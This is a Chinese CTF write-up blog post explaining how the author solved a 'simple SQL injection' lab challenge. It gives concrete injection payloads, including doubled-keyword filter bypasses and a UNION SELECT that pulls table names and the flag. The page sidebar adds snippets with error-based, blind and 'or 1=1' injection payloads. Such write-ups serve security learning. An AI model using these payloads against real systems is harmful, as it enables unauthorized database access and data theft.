实验吧三道sql注入题目解题思路以及当中至少点整理(简单的SQL注入、简单的SQL注入2、简单的SQL注入)

最新推荐文章于 2024-05-16 02:46:29 发布
最新推荐文章于 2024-05-16 02:46:29 发布
阅读量4k 收藏 2
点赞数
分类专栏: CTF以及信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaotaode2012/article/details/77112993
版权

0x00

最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理,

0x01 简单的sql注入

做题的地址为: http://ctf5.shiyanbar.com/423/web/

第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤 我们来各种试试到底过滤了什么
第二步:payload:http://ctf5.shiyanbar.com/423/web/?id=1'发现报错可以确定是字符型的注入,那来了来试试到底过滤了啥吧,尝试用payload如下:http://ctf5.shiyanbar.com/423/web/?id=1' union %23 select order by from or '1'='1,发现过滤得还挺多的基本都过 滤了,好吧来试试如何绕过吧
第三步:一般的套路绕过:内联注释、双重关键字、大小写混用、编码、。。。。。算了绕WAF的比较多,这里就不总结了改日另开新帖来说吧,这里有篇文章还不错推荐给大家:http://www.bugku.com/forum.phpmod=viewthread&tid=128&extra=page%3D1
第四步:http://ctf5.shiyanbar.com/423/web/?id=1'/**/unionunion/**/selectselect/**/table_name/**/fromfrom/**/information_schema.tables/**/wherewhere/**//**/'1'='1这 样尝试爆出表名来,居然报错,好吧 我来两个空格,估计是有个过滤函数,1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1这样可以得到表,
第五步:同样可以得到列名以及字段的数据最终payload如下:
1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

最低0.47元/天 解锁文章
xiaosec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验吧Web-易-简单sql注入之3(报错的sql盲注之exp)
Sea_Sand息禅
12-18 357
题目提示是报错注入,于是就用盲注技巧来注入。 这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧) 1.爆库 ' or exp(~(select * from(select database())a))# 这里最后面的a处可为别的字母,且必须要有 可以看到库名为web1。 2,爆表 ' or exp(~(...
pikachu sql注入题解
L1ni01
07-17 454
第一关.数字型注入(post) 首先我们介绍一下数字型和字符型的sql注入 sql注入大致也可分为数字型和字符型 如何判断是数字型还是字符型呢 数字型判断: 当输入的参 x 为整型时,通常 abc.php 中 Sql 语句类型大致如下: select * from <表名> where id = x 这种类型可以使用经典的 and 1=1 和 and 1=2 来判断: Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定(1)
最新发布
2401_84968101的博客
05-16 582
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识!真正的体系化!
实验简单SQL注入1,简单SQL注入
weixin_30770783的博客
05-07 176
接上面一篇博客。 实验简单sql注入1 题目连接 http://ctf5.shiyanbar.com/423/web/ 同样,直接输入 1加个但引号,结果下面有返回错误, , 有错,所以估计这里应该是要闭合,字符行注入,但是这个标题,到底过滤了什么,目前我还不知道过滤了什么,所以先搞一下。。 输入 1' and 1=1# 按理...
实验吧 登陆一下好吗?? 简单注入 By Assassin
Assassin
01-30 6389
题目想法挺简单的,是时候学习一下注入的套路了,真的要不简单的也想不到。发现* / select union or 都被过滤了,一开始想的太复杂了,以为是个什么waf过滤什么的,但是看了pcat前辈的WP发现真的很基础吧。但是and ‘什么的都没有过滤!payload真的简单到淫荡,看一下就是这样的 admin-> ‘=’ password-> ‘=’ 真是醉了,为
sql注入之盲注
A1956936030的博客
09-23 305
一.布尔型盲注 题目题目为sqllab-less-8 1.(1)正常页面回显 ?id=1 and 1=1 (2)页面出错 ?id=1' and 1=2 2.先判断数据库长度 ?id=0' or length(database())>7--+ true ?id=0' or length(database())>8--+ false ?id=0' or length(database())=8--+ true 最后确认数据库长度为8 3.猜库名 此时我们需要
80.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)_杨秀璋的专栏-CSDN博客1
08-03
这是一道SQL注入相关的题目SQL注入是攻击者通过输入恶意SQL语句来控制或获取数据库信息的一种攻击手段。作者可能介绍了如何识别SQL注入漏洞,以及利用注入漏洞进行数据提取或系统控制的方法。解题思路可能包括...
001-CTF web题型解题技巧-第一课 解题思路.pdf
07-09
以及各种代码审计工具,如Sqlmap,用于SQL注入攻击检测。熟悉并熟练运用这些工具,能够帮助快速定位问题和发掘隐藏信息。 在解题过程中,直接查看网页源码是基础操作。很多情况下,flag或者其他关键信息会被直接或...
bugku笔记刷题目整理
04-12
2. 解题思路:详述解决该题目的步骤,包括信息收集、漏洞分析、利用方法等。 3. 实战操作:记录实际操作过程,如HTTP请求的构造、命令执行的细节等。 4. 解决方案:提供完整或部分的解题代码,便于理解与复现。 5. ...
java面试题 java基础
09-29
本文将深入探讨Java面试中的基础知识,包括JDBC、SQL以及SSH框架,并提供一些编程题的解题思路。 首先,Java基础是所有Java面试的核心部分。这涵盖了变量、数据类型、控制流(如if语句和循环)、类和对象、封装、...
ISCC2019个人挑战赛题目练习
05-05
3. **Web安全**:可能涉及SQL注入、XSS攻击、CSRF漏洞等,参赛者需要找出并修复网站的安全弱。 4. **网络嗅探**:可能需要使用工具如Wireshark捕获并分析网络流量,识别异常行为。 5. **漏洞分析**:分析软件或...
SQL注入题1
慢慢变小佬的博客
07-06 757
service mysql start;mysql -u root -q;use mysql;show databases;id=1 order by 3 判断列数id =-1 union select 1,2,3 判断出现位数id=-1 union select 1,use(),database() 查询数据库名id=-1 union select 1,(select table_name fr...
简单sql注入学习
weixin_33807284的博客
08-26 99
sql注入是什么? 所谓SQL注入,就是通过把SQL命令插入到Web表单提 交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据 库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP...
ctf题库--简单sql注入
miko2018的博客
08-21 5859
&lt;题目&gt; mysql报错注入 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/index_3.php &lt;解答&gt; 1.打开题目链接,在查询中输入1,发现地址栏变化。 2.认为这里可能(看题目其实知道是一定)存在一个sql注入。 3.使用工具sqlmap进行注入(以该地址栏id值为例)。 查看当前数据库: Sqlmap -u "...
简单sql注入——实验
weixin_34290631的博客
07-11 450
刚刚做了实验吧的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 简单sql注入分值:10 来源:实验吧 难度:中 参与人数:18007人 Get Flag:5644人 答题人数:651...
网络安全--最简单sql注入
nuoman_cheng的博客
11-10 1067
我们平常见到的输入框: 如果用户输入: 用户名:user1 or '1'='1' 密码   : passwd1 or '1'='1' 那么,SQl会产生为: select * from  ziliao  where  username=user1 or '1'='1'  and  password = passwd1 or '1'='1' 后面的条件就永远为真,就绕过去
超详细,手把手教你一次简单SQL注入,不用任何工具,带你走进web安全的大门
weixin_55634477的博客
03-14 785
超详细,手把手教你一次简单SQL注入,不用任何工具,带你走进web安全的大门 靶场网站,网站所有权在知识盒子 知识盒子 老套的题目:提取网站数据库中存储的数据(flag) 打开网页 首先嘛,实验一下网站的功能 简单查询功能 正常操作一下 输入相应提示1 得到正确的反馈信息 错误操作一下 错误的反馈信息 右键查看网页源代码,看有么有可用信息 这里,可以得到最有可能查询的字段名称 让我们试试推理一下网站最有可能的SQL语句 条件查询语句 select 相应字段不清楚 from 表不清楚 where
完成一次简单的 SQL 注入
wujiandao的专栏
09-03 458
先来看几起 SQL 注入的安全事件: Joomla 对象注入漏洞 事件概述:2015年10月29日国外知名CMS(内容管理系统)Joomla,爆出存在SQL注入漏洞,该漏洞影响了 1.5 到 3.4.5 的所有版本,漏洞利用无须登录,直接在前台即可执行任意PHP代码。这个漏洞在libraries/joomla/sesion/sesion...
SQL TIPS
Andrewniu的博客
12-05 369
SQL语言,是结构化查询语言(Structured Query Language)的简称。SQL语言是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统;同时也是数据库脚本文件的扩展名。 1,collate是一个子句,可应用于数据库定义或列定义以定义排序规则,或应用于字符串表达式以应用排序规则投影。 语法是collate collation_name  
2023 强网杯 Writeup
01-29
2023 强网杯 Writeup

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值